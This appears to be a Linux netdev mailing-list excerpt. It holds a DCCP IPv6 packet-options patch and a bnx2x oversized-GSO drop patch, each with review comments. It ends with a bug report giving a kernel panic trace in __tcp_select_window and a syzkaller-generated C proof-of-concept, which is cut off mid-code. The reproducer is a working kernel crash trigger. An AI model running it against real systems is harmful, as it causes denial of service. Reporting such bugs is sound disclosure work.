In-Reply-To: <20170830.221649.818214075248119092.davem@davemloft.net>


Add handling of IPV6_PKTOPTIONS to dccp_v6_do_rcv() in net/dccp/ipv6.c,
similar to the handling in net/ipv6/tcp_ipv6.c

Signed-off-by: Andrii Vladyka <tulup@mail.ru>
---


[-- Attachment #2: dccp.patch --]
[-- Type: text/plain, Size: 2590 bytes --]

diff --git a/net/dccp/ipv6.c b/net/dccp/ipv6.c
index 1b58eac..35c2edb 100644
--- a/net/dccp/ipv6.c
+++ b/net/dccp/ipv6.c
@@ -16,6 +16,7 @@
 #include <linux/random.h>
 #include <linux/slab.h>
 #include <linux/xfrm.h>
+#include <linux/string.h>
 
 #include <net/addrconf.h>
 #include <net/inet_common.h>
@@ -30,6 +31,7 @@
 #include <net/ip6_checksum.h>
 #include <net/xfrm.h>
 #include <net/secure_seq.h>
+#include <net/sock.h>
 
 #include "dccp.h"
 #include "ipv6.h"
@@ -597,19 +599,13 @@ static int dccp_v6_do_rcv(struct sock *sk, struct sk_buff *skb)
 					       --ANK (980728)
 	 */
 	if (np->rxopt.all)
-	/*
-	 * FIXME: Add handling of IPV6_PKTOPTIONS skb. See the comments below
-	 *        (wrt ipv6_pktopions) and net/ipv6/tcp_ipv6.c for an example.
-	 */
 		opt_skb = skb_clone(skb, GFP_ATOMIC);
 
 	if (sk->sk_state == DCCP_OPEN) { /* Fast path */
 		if (dccp_rcv_established(sk, skb, dccp_hdr(skb), skb->len))
 			goto reset;
-		if (opt_skb) {
-			/* XXX This is where we would goto ipv6_pktoptions. */
-			__kfree_skb(opt_skb);
-		}
+		if (opt_skb)
+			goto ipv6_pktoptions;
 		return 0;
 	}
 
@@ -640,10 +636,8 @@ static int dccp_v6_do_rcv(struct sock *sk, struct sk_buff *skb)
 
 	if (dccp_rcv_state_process(sk, skb, dccp_hdr(skb), skb->len))
 		goto reset;
-	if (opt_skb) {
-		/* XXX This is where we would goto ipv6_pktoptions. */
-		__kfree_skb(opt_skb);
-	}
+	if (opt_skb)
+		goto ipv6_pktoptions;
 	return 0;
 
 reset:
@@ -653,6 +647,35 @@ static int dccp_v6_do_rcv(struct sock *sk, struct sk_buff *skb)
 		__kfree_skb(opt_skb);
 	kfree_skb(skb);
 	return 0;
+
+/* Handling IPV6_PKTOPTIONS skb the similar
+ * way it's done for net/ipv6/tcp_ipv6.c
+ */
+ipv6_pktoptions:
+	if (!((1 << sk->sk_state) & (DCCPF_CLOSED | DCCPF_LISTEN))) {
+		if (np->rxopt.bits.rxinfo || np->rxopt.bits.rxoinfo)
+			np->mcast_oif = inet6_iif(opt_skb);
+		if (np->rxopt.bits.rxhlim || np->rxopt.bits.rxohlim)
+			np->mcast_hops = ipv6_hdr(opt_skb)->hop_limit;
+		if (np->rxopt.bits.rxflow || np->rxopt.bits.rxtclass)
+			np->rcv_flowinfo = ip6_flowinfo(ipv6_hdr(opt_skb));
+		if (np->repflow)
+			np->flow_label = ip6_flowlabel(ipv6_hdr(opt_skb));
+		if (ipv6_opt_accepted(sk, opt_skb,
+				      &DCCP_SKB_CB(opt_skb)->header.h6)) {
+			skb_set_owner_r(opt_skb, sk);
+			memmove(IP6CB(opt_skb),
+				&DCCP_SKB_CB(opt_skb)->header.h6,
+				sizeof(struct inet6_skb_parm));
+			opt_skb = xchg(&np->pktoptions, opt_skb);
+		} else {
+			__kfree_skb(opt_skb);
+			opt_skb = xchg(&np->pktoptions, NULL);
+		}
+	}
+
+	kfree_skb(opt_skb);
+	return 0;
 }
 
 static int dccp_v6_rcv(struct sk_buff *skb)
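
Review bot: at the memmove() in the ipv6_pktoptions block, say why the copy from &DCCP_SKB_CB(opt_skb)->header.h6 to IP6CB(opt_skb) is needed. Both point into the skb control buffer; if header is the first member of struct dccp_skb_cb the two addresses are equal, the call does nothing, and the linux/string.h include added in the first hunk can be dropped. The comment above the label would also read better as "Handle the IPV6_PKTOPTIONS skb the same way net/ipv6/tcp_ipv6.c does".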


* [PATCH] bnx2x: drop packets where gso_size is too big for hardware
From: Daniel Axtens @ 2017-08-31  5:46 UTC (permalink / raw)
  To: netdev
  Cc: tlfalcon, Yuval.Mintz, ariel.elior, everest-linux-l2,
	jay.vosburgh, Daniel Axtens

If a bnx2x card is passed a GSO packet with a gso_size larger than
~9700 bytes, it will cause a firmware error that will bring the card
down:

bnx2x: [bnx2x_attn_int_deasserted3:4323(enP24p1s0f0)]MC assert!
bnx2x: [bnx2x_mc_assert:720(enP24p1s0f0)]XSTORM_ASSERT_LIST_INDEX 0x2
bnx2x: [bnx2x_mc_assert:736(enP24p1s0f0)]XSTORM_ASSERT_INDEX 0x0 = 0x00000000 0x25e43e47 0x00463e01 0x00010052
bnx2x: [bnx2x_mc_assert:750(enP24p1s0f0)]Chip Revision: everest3, FW Version: 7_13_1
... (dump of values continues) ...

Detect when gso_size + header length is greater than the maximum
packet size (9700 bytes) and drop the packet.

This raises the obvious question - how do we end up with a packet with
a gso_size that's greater than 9700? This has been observed on a
powerpc system when Open vSwitch is forwarding a packet from an
ibmveth device.

ibmveth is a bit special. It's the driver for communication between
virtual machines (aka 'partitions'/LPARs) running under IBM's
proprietary hypervisor on ppc machines. It allows sending very large
packets (up to 64kB) between LPARs. This involves some quite
'interesting' things: for example, when talking TCP, the MSS is stored
in the checksum field (see ibmveth_rx_mss_helper() in ibmveth.c).

Normally on a box like this, there would be a Virtual I/O Server
(VIOS) partition that owns the physical network card. VIOS lets the
AIX partitions know when they're talking to a real network and that
they should drop their MSS. This works fine if VIOS owns the physical
network card.

However, in this case, a Linux partition owns the card (this is known
as a NovaLink setup). The negotiation between VIOS and AIX uses a
non-standard TCP option, so Linux has never supported that.  Instead,
Linux just supports receiving large packets. It doesn't support any
form of messaging/MSS negotiation back to other LPARs.

To get some clarity about where the large MSS was coming from, I asked
Thomas Falcon, the maintainer of ibmveth, for some background:

"In most cases, large segments are an aggregation of smaller packets
by the Virtual I/O Server (VIOS) partition and then are forwarded to
the Linux LPAR / ibmveth driver. These segments can be as large as
64KB. In this case, since the customer is using Novalink, I believe
what is happening is pretty straightforward: the large segments are
created by the AIX partition and then forwarded to the Linux
partition, ... The ibmveth driver doesn't do any aggregation itself
but just ensures the proper bits are set before sending the frame up
to avoid giving the upper layers indigestion."

It is possible to stop AIX from sending these large segments, but it
requires configuration on each LPAR. While ibmveth's behaviour is
admittedly weird, we should fix this here: it shouldn't be possible
for it to cause a firmware panic on another card.

Cc: Thomas Falcon <tlfalcon@linux.vnet.ibm.com> # ibmveth
Cc: Yuval Mintz <Yuval.Mintz@cavium.com> # bnx2x
Thanks-to: Jay Vosburgh <jay.vosburgh@canonical.com> # veth info
Signed-off-by: Daniel Axtens <dja@axtens.net>
---
 drivers/net/ethernet/broadcom/bnx2x/bnx2x.h      |  2 ++
 drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c  | 33 +++++++++++++++---------
 drivers/net/ethernet/broadcom/bnx2x/bnx2x_link.c |  1 -
 3 files changed, 23 insertions(+), 13 deletions(-)

diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h b/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h
index 352beff796ae..b36d54737d70 100644
--- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h
+++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h
@@ -2517,4 +2517,6 @@ void bnx2x_set_rx_ts(struct bnx2x *bp, struct sk_buff *skb);
  */
 int bnx2x_vlan_reconfigure_vid(struct bnx2x *bp);
 
+#define MAX_PACKET_SIZE	(9700)
+
 #endif /* bnx2x.h */
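
Review bot: MAX_PACKET_SIZE is too generic a name for a macro now exported through the driver-wide bnx2x.h. Give it a BNX2X_ prefix and a comment saying it is the maximum packet size the new check in bnx2x_start_xmit() enforces, so the 9700 is not a bare number in the header.
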
diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c
index 1216c1f1e052..1c5517a9348c 100644
--- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c
+++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c
@@ -3742,6 +3742,7 @@ netdev_tx_t bnx2x_start_xmit(struct sk_buff *skb, struct net_device *dev)
 	__le16 pkt_size = 0;
 	struct ethhdr *eth;
 	u8 mac_type = UNICAST_ADDRESS;
+	unsigned int pkts_compl = 0, bytes_compl = 0;
 
 #ifdef BNX2X_STOP_ON_ERROR
 	if (unlikely(bp->panic))
@@ -4029,6 +4030,14 @@ netdev_tx_t bnx2x_start_xmit(struct sk_buff *skb, struct net_device *dev)
 		   skb->len, hlen, skb_headlen(skb),
 		   skb_shinfo(skb)->gso_size);
 
+		if (unlikely(skb_shinfo(skb)->gso_size + hlen > MAX_PACKET_SIZE)) {
+			BNX2X_ERR("reported gso segment size plus headers "
+				  "(%d + %d) > MAX_PACKET_SIZE; dropping pkt!",
+				  skb_shinfo(skb)->gso_size, hlen);
+
+			goto free_and_drop;
+		}
+
 		tx_start_bd->bd_flags.as_bitfield |= ETH_TX_BD_FLAGS_SW_LSO;
 
 		if (unlikely(skb_headlen(skb) > hlen)) {
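
Review bot: the BNX2X_ERR() in the new gso_size + hlen > MAX_PACKET_SIZE branch fires once per dropped packet with no rate limit, and the changelog says the oversized segments originate in another partition, so a peer can flood the host log. Rate-limit the message or count the drops instead. The format string is also split across two lines, which makes it hard to grep for, and it does not end in \n.
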
@@ -4061,21 +4070,10 @@ netdev_tx_t bnx2x_start_xmit(struct sk_buff *skb, struct net_device *dev)
 		mapping = skb_frag_dma_map(&bp->pdev->dev, frag, 0,
 					   skb_frag_size(frag), DMA_TO_DEVICE);
 		if (unlikely(dma_mapping_error(&bp->pdev->dev, mapping))) {
-			unsigned int pkts_compl = 0, bytes_compl = 0;
-
 			DP(NETIF_MSG_TX_QUEUED,
 			   "Unable to map page - dropping packet...\n");
 
-			/* we need unmap all buffers already mapped
-			 * for this SKB;
-			 * first_bd->nbd need to be properly updated
-			 * before call to bnx2x_free_tx_pkt
-			 */
-			first_bd->nbd = cpu_to_le16(nbd);
-			bnx2x_free_tx_pkt(bp, txdata,
-					  TX_BD(txdata->tx_pkt_prod),
-					  &pkts_compl, &bytes_compl);
-			return NETDEV_TX_OK;
+			goto free_and_drop;
 		}
 
 		bd_prod = TX_BD(NEXT_TX_IDX(bd_prod));
@@ -4176,6 +4174,17 @@ netdev_tx_t bnx2x_start_xmit(struct sk_buff *skb, struct net_device *dev)
 	txdata->tx_pkt++;
 
 	return NETDEV_TX_OK;
+
+free_and_drop:
+	/*
+	 * we need unmap all buffers already mapped for this SKB;
+	 * first_bd->nbd need to be properly updated before call to
+	 * bnx2x_free_tx_pkt
+	 */
+	first_bd->nbd = cpu_to_le16(nbd);
+	bnx2x_free_tx_pkt(bp, txdata, TX_BD(txdata->tx_pkt_prod),
+			  &pkts_compl, &bytes_compl);
+	return NETDEV_TX_OK;
 }
 
 void bnx2x_get_c2s_mapping(struct bnx2x *bp, u8 *c2s_map, u8 *c2s_default)
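Review bot: free_and_drop is now reached from the gso_size check as well as from the fragment dma_mapping_error path, but the cleanup was written for the latter. It stores nbd into first_bd->nbd and lets bnx2x_free_tx_pkt() unmap the BDs starting at TX_BD(txdata->tx_pkt_prod). Please confirm, and state in the comment or the commit message, that at the point of the new goto first_bd, nbd and the tx buffer entry already describe exactly what has been mapped. Otherwise the label either unmaps buffers that were never mapped or leaves some mapped. The label also returns NETDEV_TX_OK with no visible drop accounting; if bnx2x_free_tx_pkt() does not account for the discard, consider incrementing a tx drop counter here.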
diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_link.c b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_link.c
index 7dd83d0ef0a0..59a3a9419cde 100644
--- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_link.c
+++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_link.c
@@ -189,7 +189,6 @@ typedef int (*read_sfp_module_eeprom_func_p)(struct bnx2x_phy *phy,
 #define ETS_E3B0_NIG_MIN_W_VAL_20GBPS			(2720)
 #define ETS_E3B0_PBF_MIN_W_VAL				(10000)
 
-#define MAX_PACKET_SIZE					(9700)
 #define MAX_KR_LINK_RETRY				4
 #define DEFAULT_TX_DRV_BRDCT		2
 #define DEFAULT_TX_DRV_IFIR		0
-- 
2.11.0

^ permalink raw reply related

* net/ipv4: divide error in __tcp_select_window
From: idaifish @ 2017-08-31  5:56 UTC (permalink / raw)
  To: davem, Alexey Kuznetsov; +Cc: netdev, syzkaller

[-- Attachment #1: Type: text/plain, Size: 2622 bytes --]

Hi:
   It seems this bug can still be triggered by the attached PoC on the latest
Ubuntu 16.04 (4.4.0-94-generic).

============================================================================
divide error: 0000 [#1] SMP KASAN
Modules linked in:
CPU: 0 PID: 14933 Comm: syz-executor0 Not tainted 4.9.45 #1
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
task: ffff880076ab9900 task.stack: ffff880062ae8000
RIP: 0010:[<ffffffff829c1df3>]  [<ffffffff829c1df3>] __tcp_select_window+0x2f3/0x6b0 net/ipv4/tcp_output.c:2499
RSP: 0018:ffff880062aef6e8  EFLAGS: 00010283
RAX: 00000000000000ac RBX: 0000000000000000 RCX: ffffc9000195b000
RDX: 0000000000000000 RSI: 0000000000000436 RDI: ffff880079add085
RBP: ffff880062aef728 R08: 0000000000001800 R09: 0000000000000002
R10: 0000000000000000 R11: 0000000000000000 R12: 00000000000000ac
R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000001
FS:  00007f15c239a700(0000) GS:ffff88007fc00000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 000000002001c000 CR3: 0000000079628000 CR4: 00000000000006f0
DR0: 0000000000008000 DR1: 0000000000008000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000600
Stack:
 ffff880062aef6e8 ffff880062aef6e8 0000000000000000 ffff880079adca40
 0000000000000000 0000000000000436 ffff880079adcae8 0000000000000436
 ffff880062aef758 ffffffff8297c36e 0000000000000068 0000000000000000
Call Trace:
 [<ffffffff8297c36e>] tcp_cleanup_rbuf+0x43e/0x4f0 net/ipv4/tcp.c:1468
 [<ffffffff829815df>] tcp_recvmsg+0xc2f/0x25d0 net/ipv4/tcp.c:1937
 [<ffffffff82a3c32e>] inet_recvmsg+0x26e/0x3b0 net/ipv4/af_inet.c:765
 [<ffffffff827c84aa>] sock_recvmsg_nosec+0x8a/0xb0 net/socket.c:723
 [<ffffffff827d0849>] ___sys_recvmsg+0x229/0x510 net/socket.c:2113
 [<ffffffff827d25fe>] __sys_recvmmsg+0x23e/0x660 net/socket.c:2221
 [<ffffffff827d2aff>] SYSC_recvmmsg net/socket.c:2302 [inline]
 [<ffffffff827d2aff>] SyS_recvmmsg+0xdf/0x180 net/socket.c:2286
 [<ffffffff82dfb3b7>] entry_SYSCALL_64_fastpath+0x1a/0xa9
Code: ec 7c 1f e8 b0 44 9d fe 44 3b 75 d4 75 c2 e8 a5 44 9d fe 8b 45 d0 44 01 e8 41 39 c4 41 0f 4f dc eb ae e8 91 44 9d fe 44 89 e0 99 <41> f7 fe 41 0f af c6 89 c3 eb 9a e8 7d 44 9d fe 48 8d bb 91 04
RIP  [<ffffffff829c1df3>] __tcp_select_window+0x2f3/0x6b0 net/ipv4/tcp_output.c:2499
 RSP <ffff880062aef6e8>
---[ end trace 771dfab907a5c7aa ]---
Kernel panic - not syncing: Fatal exception
Kernel Offset: disabled
Rebooting in 86400 seconds..
================================================================================


-- 
Regards,
idaifish

[-- Attachment #2: report.txt --]
[-- Type: text/plain, Size: 2334 bytes --]

[-- Attachment #3: poc.c --]
[-- Type: text/x-csrc, Size: 38406 bytes --]

// autogenerated by syzkaller (http://github.com/google/syzkaller)

#define _GNU_SOURCE

#include <dirent.h>
#include <errno.h>
#include <pthread.h>
#include <setjmp.h>
#include <signal.h>
#include <stdarg.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mount.h>
#include <sys/prctl.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

const int kFailStatus = 67;
const int kRetryStatus = 69;

__attribute__((noreturn)) static void doexit(int status)
{
  volatile unsigned i;
  syscall(__NR_exit_group, status);
  for (i = 0;; i++) {
  }
}

__attribute__((noreturn)) static void fail(const char* msg, ...)
{
  int e = errno;
  fflush(stdout);
  va_list args;
  va_start(args, msg);
  vfprintf(stderr, msg, args);
  va_end(args);
  fprintf(stderr, " (errno %d)\n", e);
  doexit((e == ENOMEM || e == EAGAIN) ? kRetryStatus : kFailStatus);
}

__attribute__((noreturn)) static void exitf(const char* msg, ...)
{
  int e = errno;
  fflush(stdout);
  va_list args;
  va_start(args, msg);
  vfprintf(stderr, msg, args);
  va_end(args);
  fprintf(stderr, " (errno %d)\n", e);
  doexit(kRetryStatus);
}

static __thread int skip_segv;
static __thread jmp_buf segv_env;

static void segv_handler(int sig, siginfo_t* info, void* uctx)
{
  uintptr_t addr = (uintptr_t)info->si_addr;
  const uintptr_t prog_start = 1 << 20;
  const uintptr_t prog_end = 100 << 20;
  if (__atomic_load_n(&skip_segv, __ATOMIC_RELAXED) &&
      (addr < prog_start || addr > prog_end)) {
    _longjmp(segv_env, 1);
  }
  doexit(sig);
  for (;;) {
  }
}

static void install_segv_handler()
{
  struct sigaction sa;

  memset(&sa, 0, sizeof(sa));
  sa.sa_handler = SIG_IGN;
  syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8);
  syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8);

  memset(&sa, 0, sizeof(sa));
  sa.sa_sigaction = segv_handler;
  sa.sa_flags = SA_NODEFER | SA_SIGINFO;
  sigaction(SIGSEGV, &sa, NULL);
  sigaction(SIGBUS, &sa, NULL);
}

#define NONFAILING(...)                                                \
  {                                                                    \
    __atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST);               \
    if (_setjmp(segv_env) == 0) {                                      \
      __VA_ARGS__;                                                     \
    }                                                                  \
    __atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST);               \
  }

static void use_temporary_dir()
{
  char tmpdir_template[] = "./syzkaller.XXXXXX";
  char* tmpdir = mkdtemp(tmpdir_template);
  if (!tmpdir)
    fail("failed to mkdtemp");
  if (chmod(tmpdir, 0777))
    fail("failed to chmod");
  if (chdir(tmpdir))
    fail("failed to chdir");
}

static void remove_dir(const char* dir)
{
  DIR* dp;
  struct dirent* ep;
  int iter = 0;
retry:
  dp = opendir(dir);
  if (dp == NULL) {
    if (errno == EMFILE) {
      exitf("opendir(%s) failed due to NOFILE, exiting", dir);
    }
    exitf("opendir(%s) failed", dir);
  }
  while ((ep = readdir(dp))) {
    if (strcmp(ep->d_name, ".") == 0 || strcmp(ep->d_name, "..") == 0)
      continue;
    char filename[FILENAME_MAX];
    snprintf(filename, sizeof(filename), "%s/%s", dir, ep->d_name);
    struct stat st;
    if (lstat(filename, &st))
      exitf("lstat(%s) failed", filename);
    if (S_ISDIR(st.st_mode)) {
      remove_dir(filename);
      continue;
    }
    int i;
    for (i = 0;; i++) {
      if (unlink(filename) == 0)
        break;
      if (errno == EROFS) {
        break;
      }
      if (errno != EBUSY || i > 100)
        exitf("unlink(%s) failed", filename);
      if (umount2(filename, MNT_DETACH))
        exitf("umount(%s) failed", filename);
    }
  }
  closedir(dp);
  int i;
  for (i = 0;; i++) {
    if (rmdir(dir) == 0)
      break;
    if (i < 100) {
      if (errno == EROFS) {
        break;
      }
      if (errno == EBUSY) {
        if (umount2(dir, MNT_DETACH))
          exitf("umount(%s) failed", dir);
        continue;
      }
      if (errno == ENOTEMPTY) {
        if (iter < 100) {
          iter++;
          goto retry;
        }
      }
    }
    exitf("rmdir(%s) failed", dir);
  }
}

static uint64_t current_time_ms()
{
  struct timespec ts;

  if (clock_gettime(CLOCK_MONOTONIC, &ts))
    fail("clock_gettime failed");
  return (uint64_t)ts.tv_sec * 1000 + (uint64_t)ts.tv_nsec / 1000000;
}

static void test();

void loop()
{
  int iter;
  for (iter = 0;; iter++) {
    char cwdbuf[256];
    sprintf(cwdbuf, "./%d", iter);
    if (mkdir(cwdbuf, 0777))
      fail("failed to mkdir");
    int pid = fork();
    if (pid < 0)
      fail("clone failed");
    if (pid == 0) {
      prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0);
      setpgrp();
      if (chdir(cwdbuf))
        fail("failed to chdir");
      test();
      doexit(0);
    }
    int status = 0;
    uint64_t start = current_time_ms();
    for (;;) {
      int res = waitpid(-1, &status, __WALL | WNOHANG);
      if (res == pid)
        break;
      usleep(1000);
      if (current_time_ms() - start > 5 * 1000) {
        kill(-pid, SIGKILL);
        kill(pid, SIGKILL);
        while (waitpid(-1, &status, __WALL) != pid) {
        }
        break;
      }
    }
    remove_dir(cwdbuf);
  }
}

long r[212];
void* thr(void* arg)
{
  switch ((long)arg) {
  case 0:
    r[0] = syscall(__NR_mmap, 0x20000000ul, 0x1b000ul, 0x3ul, 0x32ul,
                   0xfffffffffffffffful, 0x0ul);
    break;
  case 1:
    r[1] = syscall(__NR_socket, 0x2ul, 0x1ul, 0x0ul);
    break;
  case 2:
    NONFAILING(*(uint32_t*)0x20018ffc = (uint32_t)0x0);
    r[3] = syscall(__NR_setsockopt, r[1], 0x1ul, 0x8ul, 0x20018ffcul,
                   0x4ul);
    break;
  case 3:
    NONFAILING(*(uint16_t*)0x20004000 = (uint16_t)0x2);
    NONFAILING(*(uint16_t*)0x20004002 = (uint16_t)0x204e);
    NONFAILING(*(uint32_t*)0x20004004 = (uint32_t)0x12000000);
    NONFAILING(*(uint8_t*)0x20004008 = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x20004009 = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2000400a = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2000400b = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2000400c = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2000400d = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2000400e = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2000400f = (uint8_t)0x0);
    r[15] = syscall(__NR_bind, r[1], 0x20004000ul, 0x10ul);
    break;
  case 4:
    NONFAILING(*(uint16_t*)0x20003000 = (uint16_t)0x2);
    NONFAILING(*(uint16_t*)0x20003002 = (uint16_t)0x204e);
    NONFAILING(*(uint32_t*)0x20003004 = (uint32_t)0x100007f);
    NONFAILING(*(uint8_t*)0x20003008 = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x20003009 = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2000300a = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2000300b = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2000300c = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2000300d = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2000300e = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2000300f = (uint8_t)0x0);
    r[27] = syscall(__NR_connect, r[1], 0x20003000ul, 0x10ul);
    break;
  case 5:
    r[28] = syscall(__NR_mmap, 0x2001c000ul, 0x1000ul, 0x1ul, 0x32ul,
                    0xfffffffffffffffful, 0x0ul);
    break;
  case 6:
    r[29] = syscall(__NR_mmap, 0x2001d000ul, 0x1000ul, 0x3ul, 0x32ul,
                    0xfffffffffffffffful, 0x0ul);
    break;
  case 7:
    r[30] = syscall(__NR_mmap, 0x20022000ul, 0x1000ul, 0x3ul, 0x32ul,
                    0xfffffffffffffffful, 0x0ul);
    break;
  case 8:
    r[31] = syscall(__NR_mmap, 0x20023000ul, 0x1000ul, 0x3ul, 0x32ul,
                    0xfffffffffffffffful, 0x0ul);
    break;
  case 9:
    r[32] = syscall(__NR_mmap, 0x2002b000ul, 0x1000ul, 0x3ul, 0x32ul,
                    0xfffffffffffffffful, 0x0ul);
    break;
  case 10:
    NONFAILING(*(uint64_t*)0x2002bdc0 = (uint64_t)0x20000000);
    NONFAILING(*(uint32_t*)0x2002bdc8 = (uint32_t)0x8);
    NONFAILING(*(uint64_t*)0x2002bdd0 = (uint64_t)0x20022fa0);
    NONFAILING(*(uint64_t*)0x2002bdd8 = (uint64_t)0x6);
    NONFAILING(*(uint64_t*)0x2002bde0 = (uint64_t)0x20022000);
    NONFAILING(*(uint64_t*)0x2002bde8 = (uint64_t)0x0);
    NONFAILING(*(uint32_t*)0x2002bdf0 = (uint32_t)0x0);
    NONFAILING(*(uint32_t*)0x2002bdf8 = (uint32_t)0x101);
    NONFAILING(*(uint64_t*)0x2002be00 = (uint64_t)0x20023ff0);
    NONFAILING(*(uint32_t*)0x2002be08 = (uint32_t)0x10);
    NONFAILING(*(uint64_t*)0x2002be10 = (uint64_t)0x20001000);
    NONFAILING(*(uint64_t*)0x2002be18 = (uint64_t)0x6);
    NONFAILING(*(uint64_t*)0x2002be20 = (uint64_t)0x2000d000);
    NONFAILING(*(uint64_t*)0x2002be28 = (uint64_t)0x0);
    NONFAILING(*(uint32_t*)0x2002be30 = (uint32_t)0x6);
    NONFAILING(*(uint32_t*)0x2002be38 = (uint32_t)0x80000000);
    NONFAILING(*(uint64_t*)0x2002be40 = (uint64_t)0x20024ffa);
    NONFAILING(*(uint32_t*)0x2002be48 = (uint32_t)0x6);
    NONFAILING(*(uint64_t*)0x2002be50 = (uint64_t)0x2001f000);
    NONFAILING(*(uint64_t*)0x2002be58 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x2002be60 = (uint64_t)0x20024000);
    NONFAILING(*(uint64_t*)0x2002be68 = (uint64_t)0x0);
    NONFAILING(*(uint32_t*)0x2002be70 = (uint32_t)0x2);
    NONFAILING(*(uint32_t*)0x2002be78 = (uint32_t)0x4);
    NONFAILING(*(uint64_t*)0x2002be80 = (uint64_t)0x20025000);
    NONFAILING(*(uint32_t*)0x2002be88 = (uint32_t)0x10);
    NONFAILING(*(uint64_t*)0x2002be90 = (uint64_t)0x20009000);
    NONFAILING(*(uint64_t*)0x2002be98 = (uint64_t)0x1);
    NONFAILING(*(uint64_t*)0x2002bea0 = (uint64_t)0x20025fe7);
    NONFAILING(*(uint64_t*)0x2002bea8 = (uint64_t)0x0);
    NONFAILING(*(uint32_t*)0x2002beb0 = (uint32_t)0x8);
    NONFAILING(*(uint32_t*)0x2002beb8 = (uint32_t)0x101);
    NONFAILING(*(uint64_t*)0x2002bec0 = (uint64_t)0x20025000);
    NONFAILING(*(uint32_t*)0x2002bec8 = (uint32_t)0x58);
    NONFAILING(*(uint64_t*)0x2002bed0 = (uint64_t)0x2000cfb0);
    NONFAILING(*(uint64_t*)0x2002bed8 = (uint64_t)0x5);
    NONFAILING(*(uint64_t*)0x2002bee0 = (uint64_t)0x20026000);
    NONFAILING(*(uint64_t*)0x2002bee8 = (uint64_t)0x0);
    NONFAILING(*(uint32_t*)0x2002bef0 = (uint32_t)0xffff);
    NONFAILING(*(uint32_t*)0x2002bef8 = (uint32_t)0x46);
    NONFAILING(*(uint64_t*)0x2002bf00 = (uint64_t)0x20027ffa);
    NONFAILING(*(uint32_t*)0x2002bf08 = (uint32_t)0x6);
    NONFAILING(*(uint64_t*)0x2002bf10 = (uint64_t)0x20004f90);
    NONFAILING(*(uint64_t*)0x2002bf18 = (uint64_t)0x7);
    NONFAILING(*(uint64_t*)0x2002bf20 = (uint64_t)0x20016000);
    NONFAILING(*(uint64_t*)0x2002bf28 = (uint64_t)0x0);
    NONFAILING(*(uint32_t*)0x2002bf30 = (uint32_t)0x6);
    NONFAILING(*(uint32_t*)0x2002bf38 = (uint32_t)0x1ff);
    NONFAILING(*(uint64_t*)0x2002bf40 = (uint64_t)0x20000ff0);
    NONFAILING(*(uint32_t*)0x2002bf48 = (uint32_t)0x10);
    NONFAILING(*(uint64_t*)0x2002bf50 = (uint64_t)0x20028000);
    NONFAILING(*(uint64_t*)0x2002bf58 = (uint64_t)0x5);
    NONFAILING(*(uint64_t*)0x2002bf60 = (uint64_t)0x20017000);
    NONFAILING(*(uint64_t*)0x2002bf68 = (uint64_t)0x0);
    NONFAILING(*(uint32_t*)0x2002bf70 = (uint32_t)0x3);
    NONFAILING(*(uint32_t*)0x2002bf78 = (uint32_t)0x6);
    NONFAILING(*(uint64_t*)0x2002bf80 = (uint64_t)0x2001c000);
    NONFAILING(*(uint32_t*)0x2002bf88 = (uint32_t)0x10);
    NONFAILING(*(uint64_t*)0x2002bf90 = (uint64_t)0x2000bfc0);
    NONFAILING(*(uint64_t*)0x2002bf98 = (uint64_t)0x4);
    NONFAILING(*(uint64_t*)0x2002bfa0 = (uint64_t)0x20029fdf);
    NONFAILING(*(uint64_t*)0x2002bfa8 = (uint64_t)0x0);
    NONFAILING(*(uint32_t*)0x2002bfb0 = (uint32_t)0x4);
    NONFAILING(*(uint32_t*)0x2002bfb8 = (uint32_t)0x0);
    NONFAILING(*(uint64_t*)0x2002bfc0 = (uint64_t)0x20015b87);
    NONFAILING(*(uint32_t*)0x2002bfc8 = (uint32_t)0x10);
    NONFAILING(*(uint64_t*)0x2002bfd0 = (uint64_t)0x20000000);
    NONFAILING(*(uint64_t*)0x2002bfd8 = (uint64_t)0x5);
    NONFAILING(*(uint64_t*)0x2002bfe0 = (uint64_t)0x20012f3f);
    NONFAILING(*(uint64_t*)0x2002bfe8 = (uint64_t)0x0);
    NONFAILING(*(uint32_t*)0x2002bff0 = (uint32_t)0x51d);
